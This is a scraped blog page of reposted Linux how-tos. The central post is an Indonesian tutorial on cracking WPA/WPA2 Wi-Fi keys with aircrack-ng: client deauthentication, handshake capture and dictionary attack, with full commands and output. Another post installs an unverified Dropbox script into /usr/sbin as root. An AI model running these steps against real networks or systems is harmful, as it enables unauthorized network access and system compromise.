Wednesday, December 16, 2015

Xtreme Download Manager: Alternative Internet Download Manager for Linux

Xtreme Download Manager (xdman)  is an download manager app based on Java. it advanced and powerful download manager app which claims that can increase download speed, It also support pause and resume broken download and capture FLV videos from any sites .
xdman uses sophisticated dynamic segmentation algorithm,data compression and connection reuse to speed up the download process. Xtreme Download Manager supports HTTP, HTTPS and FTP protocols, firewalls, proxy servers, file redirects, cookie, authorization etc. Xtreme Download Manager integrates with any browser to handle downloads automatically using Advanced browser integration.
Depend on Java Runtime 6 (JRE6) or Latest jRE, xdman running perfectly on Ubuntu 13.04 or Ubuntu previous version with OpenJDK-JRE. It also can running on major OS like Windows,Mac OSX, Linux Distribustion that installed JRE.
Xdman Features
  • Download files at maximum possible speed. ( 5-6 times faster )
  • Sophisticated dynamic file segmentation algorithm,data compression & connection reuse.
  • Download FLV videos from YouTube, MySpaceTV, Google Video or Any Other site
  • Capture download from any browser (Firefox,Chrome,Internet Explorer,Opera,Safari or any other program trying to download a file from Internet)
  • Supports HTTP,HTTPS,FTP protocols with Authentication,Proxy Servers, Cookies, Redirection etc.
  • Resumes broken/dead downloads caused by connection problem,power failure or session expiration
  • Highly portable. Runs on any O.S with Java SE 6. No need for installation.
  • Can be configured to perform Automatic Antivirus checking, System shutdown on download completion

How to Install Xtreme Download Manager

On ubuntu, installing Xtreme Download Manager very easy. First download Xtreme Download Manager from here, you can also download it from terminal by typing command:
wget -O xdman.zip http://sourceforge.net/projects/xdman/files/xdman.zip/download
Extract xdman.zip
mkdir xdman
unzip xdman.zip -d xdman/
Enter to directory xdman/ and make exexutable file xdman.sh
cd xdman/
chmod +x xdman.sh
Run xdman.sh
./xdman.sh
Wait few second, it will be asking you to integrate xdman with your browser.

source link : http://ubuntuportal.com/2013/04/xtreme-download-manager-alternative-internet-download-manager-for-linux.html

Tuesday, December 15, 2015

How to install Emmet in Sublime Text 3


Emmet is the best plugin ever made to increase your speed in writing codes and increase your efficiency. It is a plugin for many popular text editors which greatly improves HTML & CSS workflow.
I was using Emmet in sublime text 2. But as Sublime Text 3 beta released, I updated by Sublime to the latest version and found that Emmet was not working in Sublime Text 3. So I started my search but unfortunately I was unable to find a working solution. There were many sites and tuts but they were not guiding properly. So finally I found the solution by myself. I know this is the same as Sublime Text 2’s way but it does not matter.

equirements:

  • Sublime Text 3
  • And a good sense of following steps… :p

Steps:

Installing Package control

  1. Open Sublime Text 3.
  2. Open console by pressing CTRL + ` or going to View > Show Console.
  3. Paste the following code and press Enter.

Source Code

import urllib.request,os; pf = 'Package Control.sublime-package'; ipp = sublime.installed_packages_path(); urllib.request.install_opener( urllib.request.build_opener( urllib.request.ProxyHandler()) ); open(os.path.join(ipp, pf), 'wb').write(urllib.request.urlopen( 'http://sublime.wbond.net/' + pf.replace(' ','%20')).read())


4. Wait for a minute and restart your Sublime Text.

Installing Emmet (Main Part)

  1. After you have successfully installed Package Control, open Command Palette by pressing CTRL + SHIFT + P or going to Tools > Command Palette…
  2. Type install and click on Package Control: Install Package.
  3. After loading type Emmet in the search bar and click on Emmet.
  4. Wait for it to install (and yes this is also a step). Leave your system for 2-3 minutes as it will install some required repositories also like PyV8. Keep an eye on the Status bar (the light grey bar in the bottom of your editor which shows the Line and the Column number).
  5. After your status bar is clean and has nothing except the Line and Column number restart you Sublime.
and Look out..!!! Emmet is installed in your Sublime.
Enjoy and keep coding. And if there is any problem with the steps please comment below.

Note: This has been tested in Sublime Text 3 build 3062

 source link : http://www.ishaanrawat.com/install-emmet-sublime-text-3/

Monday, June 1, 2015

Wifi Cracking WPA/WPA2 - Aircrack-ng

WPA/WPA2 Crack dengan aircrack-ng suite, cara nya tidak jauh berbeda dengan crack WEP, tetapi dalam proses nya akan membutuhkan waktu yang lama. pada dasar nya cracking WPA sama seperti WEP hanya saja yang kita tangkap/capture adalah WPA Handshake bukan nya IVs seperti ketika kita mengaudit WEP. WPA Handshake disini adalah sekumpulan file hasil tangkapan pada lalu lintas jaringan pada accses point (AP) tertentu yang kita jadikan target.

Pertama, solusi ini mengasumsikan:

     Kita menggunakan driver yang sudah di patch untuk injeksiGunakan tes injeksi untuk mengkonfirmasikan kartu wireless bisa melakukan proses injection sebelum melanjutkan. secara fisik kita harus dekat dengan accses point (AP), karena walaupun kita bisa menerima paket dari AP tersebut, belum tentu kita juga dapat mengirimkan paket ke AP itu.

Dalam tutorial ini, kita menggunakan:

    Alamat MAC dari PC yang menjalankan aircrack-ng: 00:00 F: B5: 88: AC: 82
    Alamat MAC dari AP target menggunakan WPA2: 00:0 F: B5: FD: FB: C2
    BSSID (MAC alamat AP): 0:14:06 C: 7E: 40:80
    ESSID (nama AP target/klien): teddy
    Channel: 9
    Wireless interface: wlan0
    Driver: r8187 (patched)


Kita harus mengumpulkan informasi sebanyak-banyak nya dari AP, kemudian kita hanya mengubah nilai-nilai pada contoh di bawah ini untuk jaringan tertentu.
Tujuannya adalah untuk menangkap Handshake authentikasi WPA/WPA2 dan kemudian menggunakan aircrack-ng untuk proses cracking Pre Shared Key (PSK) nya..

Hal ini dapat dilakukan baik secara aktif maupun pasif. "Aktif" berarti kita akan mempercepat proses dengan deauthenticating wireless klien yang ada. "Pasif" berarti kita hanya menunggu wireless klien untuk authentikasi sendiri ke jaringan WPA/WPA2 tersebut. Keuntungan pasif adalah bahwa kita tidak benar-benar membutuhkan kemampuan injeksi dan dengan demikian aircrack-ng versi Windows pun dapat digunakan.

Berikut adalah langkah-langkah dasar:

  1. Jalankan wireless interface dalam mode monitor pada channel AP tertentu.
  2. Jalankan airodump-ng pada channel AP dengan filterBSSID untuk mengumpulkan handshake authentication
  3. Gunakan aireplay-ng # untuk deauthenticate wireless client
  4. Jalankan aircrack-ng untuk cracking PSK menggunakan handshake authentication


Langkah 1 - Jalankan interface nirkabel dalam mode monitor

Tujuan dari langkah ini adalah untuk menempatkan kartu kita ke dalam apa yang disebut mode monitor. Monitor mode adalah mode dimana kartu dapat mendengarkan setiap paket. Biasanya kartu hanya akan "mendengar" paket yang ditujukan kepada nya. Dengan mendengar setiap paket, kita kemudian dapat menangkap WPA/WPA2 4-way handshake. Selain, itu memungkinkan kita untuk melakukan opsional deauthenticate wireless klien pada langkah berikutnya.

Prosedur yang tepat untuk memungkinkan mode monitor sangat bervariasi tergantung pada driver yang kita gunakan. Untuk menentukan driver (dan prosedur yang benar untuk mengikuti), jalankan perintah berikut:

 airmon-ng

Pada mesin dengan realtek terpasang, sistem merespon:

 Interface           Chipset                   driver

 wlan0                realtek                   r8187


Driver r8187 (stack-ieee82011) kita pakai, karena driver ini mampu melakukan penetrasi dan injeksi lebih baik dari pada driver rtl8187 (stacks-mac82011), karena kita tak ingin berlama-lama dalam mengumpulkan data unuk menangkap WPA Handshake, karena sesungguh nya proses cracking WPA/WPA2 titik kesulitan nya pada sesi cracking Handshake tersebut.

Langkah 2 - Jalankan airodump-ng untuk mengumpulkan handshake authentication

Tujuan dari langkah ini adalah dengan menjalankan airodump-ng untuk menangkap 4-way WPA Handshake authentikasi terhadap AP target.

Masukkan:

 airodump-ng -c 9 --bssid 00:14:06 C: 7E: 40:80 -w psk wlan0


Dimana:

    -c 9 adalah channel dari target
    -bssid 00:14:06 C: 7E: 40:80 adalah MAC address AP.
    -w psk adalah nama file yg akan berisi WPA Hndshake
     wlan0 adalah nama interface.



Berikut tampilan jika wireless klien terhubung ke jaringan:


  CH  9 ][ Elapsed: 4 s ][ 2007-03-24 16:58 ][ WPA handshake: 00:14:6C:7E:40:80
                                                                                                               
  BSSID                     PWR  RXQ   Beacons    #Data,  #/s  CH  MB    ENC     CIPHER    AUTH    ESSID
                                                                                                               
  00:14:6C:7E:40:80   39        100     51                116     14      9      54  WPA2    CCMP       PSK        teddy                           
                                                                                                               
  BSSID                      STATION               PWR  Lost  Packets  Probes                                             
                                                                                                               
  00:14:6C:7E:40:80  00:0F:B5:FD:FB:C2      35      0        116



Pada layar di atas, perhatikan "WPA Handshake: 00:14:06 C: 7E: 40:80" di sudut kanan atas. Ini berarti airodump-ng telah berhasil menangkap 4-way WPA Handshake.

Berikut ini adalah jika wireless klien gagal tersambung:


  CH  9 ][ Elapsed: 4 s ][ 2007-03-24 17:51 
                                                                                                               
  BSSID                     PWR   RXQ    Beacons    #Data, #/s  CH  MB  ENC     CIPHER AUTH  ESSID
                                                                                                               
  00:14:6C:7E:40:80   39        100       51                0    0        9     54  WPA2  CCMP    PSK  teddy                           
                                                                                                               
  BSSID              STATION            PWR  Lost  Packets  Probes  





Langkah 3 - Gunakan aireplay-ng # untuk deauthenticate wireless client

Langkah ini adalah opsional. Jika kita bersabar, kita dapat menunggu sampai airodump-ng menangkap WPA Handshake ketika satu atau lebih klien terhubung ke AP. kita hanya melakukan langkah ini jika memilih untuk secara aktif mempercepat proses. Kendala lain adalah bahwa harus ada klien yang saat ini terkait (assosiate) dengan AP. Jika tidak ada klien terkait dengan AP, maka kita harus bersabar dan menunggu seseorang untuk terhubung ke AP sehingga WPA Handshake dapat ditangkap. Tak perlu dikatakan, jika klien muncul kemudian airodump-ng tidak dapat menangkap WAP Handshake, kita kembali dan harus melakukan langkah ini.

Langkah ini mengirimkan pesan ke klien dengan mengatakan bahwa tidak dikaitkan dengan AP. Wireless client akan diharapkan reauthenticate dengan AP. Reauthentication adalah apa yang di hasilkan WPA Handshake 4-way, Ini yang akan kita gunakan untuk memecah kunci PSK dari WPA/WPA2.

Berdasarkan output dari airodump-ng dalam langkah sebelumnya, kita menentukan klien yang saat ini terhubung. kita memerlukan MAC address dari AP target.

Buka konsol sesi lain dan masukkan:

 aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0


Dimana:

  -0 adalah deauthentication
   1  adalah jumlah deauths untuk dikirim (berapa pun terserah kita)
  -a 00:14:6C:7E:40:80 adalah MAC address dari access point
  -c 00:0F:B5:FD:FB:C2 adalah MAC address dari client ( stations )
   wlan0 adalah interface



Berikut adalah tampilan nya:

 11:09:28  Sending DeAuth to station   -- STMAC: [00:0F:B5:34:30:30]

Dengan sedikit keberuntungan klien akan reauthenticate dan menghasilkan 4-way WPA Handshake.


Tips Mengatasi Masalah

    Paket-paket deauthentication dikirim langsung dari PC ke klien. Jadi, kita harus secara fisik cukup dekat kepada klien untuk transmisi wireless dan menjangkau mereka. Untuk mengkonfirmasi klien menerima paket deauthentication, dapat menggunakan tcpdump atau yang lain untuk mencari paket ACK dari klien. Jika kita  tidak mendapatkan paket ACK , maka klien tidak "mendengar" paket deauthentication.

Langkah 4 - Jalankan aircrack-ng untuk memecahkan WPA PSK key

Tujuan dari langkah ini adalah untuk benar-benar memecahkan kunci WPA/WPA2. Untuk melakukan ini, kita membutuhkan kamus kata-kata ( DICTIONARY )sebagai masukan. Pada dasarnya, aircrack-ng mengambil setiap kata dan di tes untuk melihat apakah ini sebenarnya kunci  PSK nya.

Ini yang benar-benar letak kesulitan nya cracking WPA/WPA2, kita harus mempunyai kamus (dictionary) berisi ( kemungkinan berisi ) password yang di pakai oleh jaringan wireless tersebut, sebanyak berapa pun isi kamus tersebut jika tak berisi kandidat password jaringan tersebut kemungkinan menemukan kunci nya adalah 0%, dan jika kamus itu berisi dan salah satu nya adalah password dari jaringan itu, maka dengan senang hati penulis akan mengucapkan selamat dan berapa beruntung nya anda. :D

Ada beberapa cara yang sebenar nya bisa di pakai, tapi sekali lagi keberuntungan saja yang akan membuat berhasil, karena bagaimana pun juga keberhasilan cracking WPA tergantung kamus (dictionary). seandai nya bisa seperti WEP yang dimana cracking password nya ON THE FLY artinya menemukan sendiri password tanpa kamus. disini lah perbedaan WEP dengan WPA. saking gampang nya WEP tidak lagi di rekomendasikan penggunaan nya. cara lain adalah dengan menyambung ( PIPE ) aircrack-ng  dengan program lain seperti john the ripper (JTR), JTR adalah program cracking dan password generator. ( lain kali kita bahas cara mem-pipe aircrack-ng dengan JTR atau generator-generator lain ).

lanjut......

Buka konsol sesi lain dan masukkan:

aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap


Dimana:

    -W password.lst adalah nama dari file kamus. Ingatlah untuk menentukan path lengkap jika file tersebut tidak terletak di direktori yang sama.
    *. Cap adalah nama sekelompok file yang berisi paket yang diambil. Perhatikan dalam kasus ini, bahwa kita menggunakan wildcard * untuk memasukkan beberapa file.

Berikut adalah output jika WPA Handshake tidak ditemukan:

 Opening psk-01.cap
 Opening psk-02.cap
 Opening psk-03.cap
 Opening psk-04.cap
 Read 1827 packets.

 No valid WPA handshakes found.


Ketika ini terjadi, kita harus mengulang langkah 3 (deauthenticating klien nirkabel) atau menunggu lebih lama jika Anda menggunakan pendekatan pasif. Bila menggunakan pendekatan pasif, Anda harus menunggu sampai klien nirkabel mengotentikasi ke AP.

Berikut adalah output WPA Handshake jika ditemukan:

 Opening psk-01.cap
 Opening psk-02.cap
 Opening psk-03.cap
 Opening psk-04.cap
 Read 1827 packets.

 #  BSSID                      ESSID                     Encryption

 1  00:14:6C:7E:40:80    teddy                        WPA (1 handshake)

 Choosing first network as target.




Sekarang pada titik ini, aircrack-ng akan mulai mencoba untuk memecahkan kunci PSK. Tergantung pada kecepatan CPU dan ukuran kamus, ini bisa memakan waktu lama, bahkan berhari-hari.

Berikut adalah proses cracking akan terlihat seperti:

                                                           Aircrack-ng 0.8


                                          [00:00:00] 2 keys tested (37.20 k/s)


                                               KEY FOUND! [ 12345678 ]



    Master Key             : CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E 
                                     B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD 

    Transcient Key        : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98 
                                     CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40 
                                     FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E 
                                     2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71 

    EAPOL HMAC     : 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB 

WPA/WPA2 proses cracking nya membutuh kan sedikit keberuntungan dengan kamus-kamus koleksi kita, di internet banyak sekali situs-situs yang menyediakan kamus gratis, kita bisa saja mengambilnya dan berharap dalam kamus tersebut akan berisi password dari target jaringan yang ingin kita hack.
PENTING: WPA/WPA2 bisa memakai password dari 8 digit sampai 63 digit, dan semua karakter di keyboard bisa di pakai contoh `~!@#$%^&*()_-+|\ bahkan spasi (space) pun bisa menjadi kombinasi password nya, tak hanya angka (number), huruf kecil (lettercase), huruf besar (uppercase). jadi bisa di bayangkan berapa secure (kuat) nya kombinasi password WPA/WPA2.
Jadi sekali lagi, pandai-pandai memilih kamus, yang sekiranya tepat dan akurat. mengenai piping aircrack-ng dengan JTR dan kamus generator lain, kita bahas lain kali.
semoga berhasil.
## tulisan ini bersumber dari aircrack-ng.org dan diterjemahkan bebas oleh penulis, dan sedikit bahasa pribadi dari pengalaman penulis. kunjungi situs resmi aircrack-ng dan juga forum resmi nya untuk lebih lanjut nya.
sumber copas : click me!

Monday, May 18, 2015

How to Create Keyboard Shortcuts on Kali Linux

1. Kali Linux (http://kali.org)
How to Create Keyboard Shortcuts on Kali Linux:

1. First go to

    Applications –> System tools –> Preferences –> System Settings

2. On the System settings, find hardware group and choose keyboar

  3. Choose and click shortcuts tab, and press the plus + sign at the bottom to add a new shortcut.

2. On the System settings, find hardware group and choose keyboard - See more at: http://www.hacking-tutorial.com/tips-and-trick/how-to-create-keyboard-shortcuts-on-kali-linux/#sthash.xzswmNIV.7agpyVMG.dpuf


 4. Put the name(use the name that easy to recognize) and the command (in this case it is a terminal)

5. Click the disabled area until it change the words to New accelerator.


6. Now you can choose which shortcut you want for your Kali Linux. In this example we use CTRL + ALT + T to call the terminal.


 We can directly try our new kali linux keyboard settings.
Hope you found it useful :-)

source : Click me ... !
1. Kali Linux (http://kali.org)

How to Create Keyboard Shortcuts on Kali Linux:

1. First go to
Applications –> System tools –> Preferences –> System Settings
- See more at: http://www.hacking-tutorial.com/tips-and-trick/how-to-create-keyboard-shortcuts-on-kali-linux/#sthash.xzswmNIV.7agpyVMG.dpuf

Monday, May 11, 2015

Enable ppa (ubuntu repositories) in Kali Linux!

by D4RkNiK0l4s
1. wget https://www.dropbox.com/s/8mjqwvqtban68su/add-apt-repository.sh.txt

2 . copy and rename the file  $ mv  /root/add-apt-repository.sh.txt   /root/add-apt-repository
$ cp  /root/add-apt-repository   /usr/sbin/add-apt-repository
3. Change permissions to execute
$ chmod o+x /usr/sbin/add-apt-repository
4. Change ownership to root

$chown root:root /usr/sbin/add-apt-repository
5. Now when ever you need to execute command type

$ sudo add-apt-repository ppa: ppa - name

Disclaimer:adding ppa can have adverse effects on debian machines
so , be  careful
..


Source : http://www.blackhat-sec.com/2014/10/enable-ppa-ubuntu-repositories-in-kali.html